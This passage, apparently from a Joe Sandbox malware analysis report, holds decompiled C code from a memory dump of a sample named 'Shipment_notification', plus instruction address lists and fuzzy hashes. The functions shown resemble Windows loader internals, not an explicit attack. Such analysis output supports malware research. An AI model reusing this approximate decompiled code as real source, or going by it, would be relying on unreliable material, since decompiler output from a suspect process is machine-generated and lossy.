								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01B12EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01B12EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E01AE58EC(_t240);
									_t221 =  *0x1bd5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1bd5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01B24A2C(0x1bd6e40, 0x1b24b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01B07D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1ac5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E01B1F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E01B1F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01B67016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01B02400(_t267 + 0x20);
															}
															L01B02400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01B12397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01B02280(_t134, 0x1bd8608);
									__eflags =  *0x1bd6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E01AFFFB0(_t198, _t241, 0x1bd8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1bd6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1bd8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01B16B90(_t210,  &_v64);
										_t262 =  *0x1bd8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E01B1E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E01B297C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E01B2006A(0x1bd8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1bd8608);
												E01B2B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1bd6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1bd6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E01AFFFB0(_t198, _t240, 0x1bd8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E01B200C2(0x1bd8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                0x01b120a0
                                                                                0x01b120a8
                                                                                0x01b120ad
                                                                                0x01b120b3
                                                                                0x01b120b8
                                                                                0x01b120c2
                                                                                0x01b120c7
                                                                                0x01b120cb
                                                                                0x01b120d2
                                                                                0x01b12263
                                                                                0x01b12266
                                                                                0x01b55836
                                                                                0x01b55836
                                                                                0x00000000
                                                                                0x01b1226c
                                                                                0x01b1226c
                                                                                0x01b12270
                                                                                0x01b12274
                                                                                0x01b120e2
                                                                                0x01b120e2
                                                                                0x01b120e6
                                                                                0x01b120ee
                                                                                0x01b557dc
                                                                                0x01b557de
                                                                                0x01b557ec
                                                                                0x01b557ec
                                                                                0x01b557f1
                                                                                0x01b557f3
                                                                                0x01b557f8
                                                                                0x00000000
                                                                                0x01b557f8
                                                                                0x01b557e0
                                                                                0x01b557e4
                                                                                0x01b557ea
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b557ea
                                                                                0x01b120f4
                                                                                0x01b120f4
                                                                                0x01b120f8
                                                                                0x01b120f8
                                                                                0x01b120fc
                                                                                0x01b12100
                                                                                0x01b12106
                                                                                0x01b12201
                                                                                0x01b12206
                                                                                0x01b1220b
                                                                                0x01b1220e
                                                                                0x01b122a9
                                                                                0x01b122ac
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b122b2
                                                                                0x01b122b5
                                                                                0x01b55801
                                                                                0x01b55806
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55810
                                                                                0x01b55815
                                                                                0x01b55818
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5581e
                                                                                0x01b122bb
                                                                                0x01b122bb
                                                                                0x01b12218
                                                                                0x01b12218
                                                                                0x01b1221c
                                                                                0x01b12220
                                                                                0x01b12222
                                                                                0x01b122c2
                                                                                0x01b122c4
                                                                                0x01b122dc
                                                                                0x01b122dc
                                                                                0x01b122e1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b122e7
                                                                                0x01b122c8
                                                                                0x01b122cd
                                                                                0x01b122d3
                                                                                0x01b122d6
                                                                                0x01b55823
                                                                                0x01b55825
                                                                                0x01b55827
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5582d
                                                                                0x00000000
                                                                                0x01b5582d
                                                                                0x00000000
                                                                                0x01b12228
                                                                                0x01b12228
                                                                                0x00000000
                                                                                0x01b12228
                                                                                0x01b12222
                                                                                0x01b12214
                                                                                0x01b12214
                                                                                0x00000000
                                                                                0x01b12114
                                                                                0x01b12114
                                                                                0x01b12114
                                                                                0x01b1211a
                                                                                0x01b1211c
                                                                                0x01b12348
                                                                                0x01b1234d
                                                                                0x01b55840
                                                                                0x01b55845
                                                                                0x01b55848
                                                                                0x01b5584e
                                                                                0x01b5584e
                                                                                0x01b55848
                                                                                0x01b12353
                                                                                0x01b12355
                                                                                0x01b12388
                                                                                0x01b12388
                                                                                0x01b12368
                                                                                0x01b1236a
                                                                                0x01b1236c
                                                                                0x01b1238f
                                                                                0x00000000
                                                                                0x01b1236e
                                                                                0x01b1236e
                                                                                0x01b1218e
                                                                                0x01b1218e
                                                                                0x01b12191
                                                                                0x01b12195
                                                                                0x01b55a03
                                                                                0x01b55a06
                                                                                0x01b55a0c
                                                                                0x01b55a0f
                                                                                0x01b55a11
                                                                                0x01b55a13
                                                                                0x01b55a13
                                                                                0x01b55a19
                                                                                0x01b55a1f
                                                                                0x00000000
                                                                                0x01b1219b
                                                                                0x01b1219b
                                                                                0x01b121a0
                                                                                0x01b12282
                                                                                0x01b12284
                                                                                0x01b12284
                                                                                0x01b12284
                                                                                0x01b12284
                                                                                0x01b121a6
                                                                                0x01b121a9
                                                                                0x01b121ac
                                                                                0x01b121ae
                                                                                0x01b121b3
                                                                                0x01b1228b
                                                                                0x01b12290
                                                                                0x01b12379
                                                                                0x01b12296
                                                                                0x01b12298
                                                                                0x01b12298
                                                                                0x01b12290
                                                                                0x01b121b9
                                                                                0x01b121be
                                                                                0x01b122a2
                                                                                0x01b122a2
                                                                                0x01b121c4
                                                                                0x01b121c8
                                                                                0x01b121cc
                                                                                0x01b121d0
                                                                                0x01b121d4
                                                                                0x01b121de
                                                                                0x01b121e3
                                                                                0x01b55a29
                                                                                0x01b55a2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55a3b
                                                                                0x00000000
                                                                                0x01b121e9
                                                                                0x01b121e9
                                                                                0x01b121e9
                                                                                0x01b121ee
                                                                                0x01b121f1
                                                                                0x01b55a45
                                                                                0x01b55a4b
                                                                                0x01b55a52
                                                                                0x01b55a58
                                                                                0x01b55a5d
                                                                                0x01b55a5f
                                                                                0x01b55a71
                                                                                0x01b55a61
                                                                                0x01b55a6a
                                                                                0x01b55a6a
                                                                                0x01b55a76
                                                                                0x01b55a79
                                                                                0x01b55a7f
                                                                                0x01b55a83
                                                                                0x01b55a85
                                                                                0x01b55a87
                                                                                0x01b55a87
                                                                                0x01b55a8c
                                                                                0x01b55a91
                                                                                0x01b55a97
                                                                                0x01b55a9f
                                                                                0x01b55aa0
                                                                                0x01b55aa1
                                                                                0x01b55aa6
                                                                                0x01b55aab
                                                                                0x01b55ab1
                                                                                0x01b55ab3
                                                                                0x01b55ab9
                                                                                0x01b55aca
                                                                                0x01b55ad4
                                                                                0x01b55ad4
                                                                                0x01b55ade
                                                                                0x01b55ade
                                                                                0x01b55aab
                                                                                0x01b55a79
                                                                                0x01b55a52
                                                                                0x01b121f7
                                                                                0x01b121f9
                                                                                0x01b121fe
                                                                                0x01b121fe
                                                                                0x01b121e3
                                                                                0x01b12195
                                                                                0x01b1236c
                                                                                0x01b12122
                                                                                0x01b12122
                                                                                0x01b12124
                                                                                0x01b12231
                                                                                0x01b12236
                                                                                0x01b12236
                                                                                0x01b12238
                                                                                0x01b12238
                                                                                0x01b12240
                                                                                0x01b12242
                                                                                0x01b12244
                                                                                0x01b559fc
                                                                                0x01b1218c
                                                                                0x01b1218c
                                                                                0x00000000
                                                                                0x01b1218c
                                                                                0x01b1224a
                                                                                0x01b1224f
                                                                                0x01b12256
                                                                                0x01b12304
                                                                                0x01b12309
                                                                                0x01b1230f
                                                                                0x01b1231e
                                                                                0x01b1231e
                                                                                0x01b1231e
                                                                                0x01b12320
                                                                                0x01b12325
                                                                                0x01b1232a
                                                                                0x01b1232c
                                                                                0x01b1233e
                                                                                0x01b1233e
                                                                                0x00000000
                                                                                0x01b1232c
                                                                                0x01b12311
                                                                                0x01b12317
                                                                                0x01b1231a
                                                                                0x01b1231c
                                                                                0x01b12380
                                                                                0x01b12380
                                                                                0x01b12380
                                                                                0x01b12384
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12386
                                                                                0x00000000
                                                                                0x01b1231c
                                                                                0x01b1225c
                                                                                0x01b1225c
                                                                                0x00000000
                                                                                0x01b1225c
                                                                                0x01b1212a
                                                                                0x01b12134
                                                                                0x01b12138
                                                                                0x01b1213d
                                                                                0x01b55858
                                                                                0x01b55863
                                                                                0x01b55863
                                                                                0x01b55867
                                                                                0x01b5586a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5586c
                                                                                0x01b5586c
                                                                                0x01b55871
                                                                                0x01b55875
                                                                                0x01b55877
                                                                                0x01b55997
                                                                                0x01b5599c
                                                                                0x01b559a1
                                                                                0x01b559a7
                                                                                0x01b559a7
                                                                                0x00000000
                                                                                0x01b559a7
                                                                                0x01b5587d
                                                                                0x00000000
                                                                                0x01b5588b
                                                                                0x01b5588b
                                                                                0x01b55890
                                                                                0x01b55892
                                                                                0x01b55894
                                                                                0x01b55899
                                                                                0x01b5589b
                                                                                0x01b558a0
                                                                                0x01b558a0
                                                                                0x01b558aa
                                                                                0x01b558b2
                                                                                0x01b558b6
                                                                                0x01b558be
                                                                                0x01b558c6
                                                                                0x01b558c9
                                                                                0x01b5590d
                                                                                0x01b55917
                                                                                0x01b5591a
                                                                                0x01b5591c
                                                                                0x01b55920
                                                                                0x01b55928
                                                                                0x01b5592a
                                                                                0x01b5592c
                                                                                0x01b5592e
                                                                                0x01b5592e
                                                                                0x01b558cb
                                                                                0x01b558cd
                                                                                0x01b558d8
                                                                                0x01b558e0
                                                                                0x01b558f4
                                                                                0x01b558fe
                                                                                0x01b558fe
                                                                                0x01b5593a
                                                                                0x01b5593e
                                                                                0x01b55940
                                                                                0x01b55942
                                                                                0x00000000
                                                                                0x01b55944
                                                                                0x01b55944
                                                                                0x01b55949
                                                                                0x01b5594e
                                                                                0x01b5594e
                                                                                0x01b55953
                                                                                0x01b5595b
                                                                                0x01b55976
                                                                                0x01b55976
                                                                                0x01b5597a
                                                                                0x01b5597f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55981
                                                                                0x01b55981
                                                                                0x01b55981
                                                                                0x01b55983
                                                                                0x01b55988
                                                                                0x01b5598d
                                                                                0x01b55991
                                                                                0x01b55991
                                                                                0x00000000
                                                                                0x01b5595d
                                                                                0x01b5595d
                                                                                0x01b55963
                                                                                0x01b55965
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55967
                                                                                0x01b55967
                                                                                0x01b5596b
                                                                                0x01b5596d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5596f
                                                                                0x01b55971
                                                                                0x01b55971
                                                                                0x01b55974
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55974
                                                                                0x00000000
                                                                                0x01b55967
                                                                                0x01b5595b
                                                                                0x01b55942
                                                                                0x01b55863
                                                                                0x01b12143
                                                                                0x01b12143
                                                                                0x01b12149
                                                                                0x01b1214f
                                                                                0x01b122f1
                                                                                0x01b122f6
                                                                                0x00000000
                                                                                0x01b12173
                                                                                0x01b12173
                                                                                0x01b1217d
                                                                                0x01b12181
                                                                                0x01b12186
                                                                                0x01b559ae
                                                                                0x01b559b2
                                                                                0x01b559b5
                                                                                0x01b559b7
                                                                                0x01b559ba
                                                                                0x01b559cd
                                                                                0x01b559d1
                                                                                0x01b559d5
                                                                                0x01b559d9
                                                                                0x01b559db
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b559dd
                                                                                0x01b559dd
                                                                                0x01b559e1
                                                                                0x01b559e4
                                                                                0x01b559e7
                                                                                0x01b559ee
                                                                                0x01b559ee
                                                                                0x01b559f3
                                                                                0x01b559f3
                                                                                0x00000000
                                                                                0x01b12186
                                                                                0x01b1214f
                                                                                0x01b12106
                                                                                0x01b12266
                                                                                0x01b120d8
                                                                                0x01b120da
                                                                                0x01b120e0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6515ec494a6008758cd290f079750361084866d4e6bf7b1fadc81fde3aecec25
                                                                                • Instruction ID: 0d2ee518c889937cf65c2fa3e1298ebb66d6e306821b74f9442536f2c7388dee
                                                                                • Opcode Fuzzy Hash: 6515ec494a6008758cd290f079750361084866d4e6bf7b1fadc81fde3aecec25
                                                                                • Instruction Fuzzy Hash: 9BF105356083419FEB3ECB2DC44076A7BE1EF85324F6686EDE9958B285D734D841CB82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AFD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E01AFD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x1bdd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = L01AF6600(0x1bd52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1bd7b9c; // 0x0
							_t281 = L01B04620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E01B2F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1bd7b90; // 0x77090000
								if(_t384 == 0) {
									_t353 =  *0x1bd7b8c; // 0x1582ac0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01B02280(_t200, 0x1bd84d8);
									_t277 =  *0x1bd85f4; // 0x1582fb0
									_t351 =  *0x1bd85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1582f48
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E01AFFFB0(_t287, _t353, 0x1bd84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E01B3CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = L01AF6600(0x1bd52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01AF7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x1bdb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E01B6E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1bd8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x1bdb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x1bdb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01B02280(_t250, 0x1bd84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01B23898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E01AFFFB0(_t293, _t353, 0x1bd84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
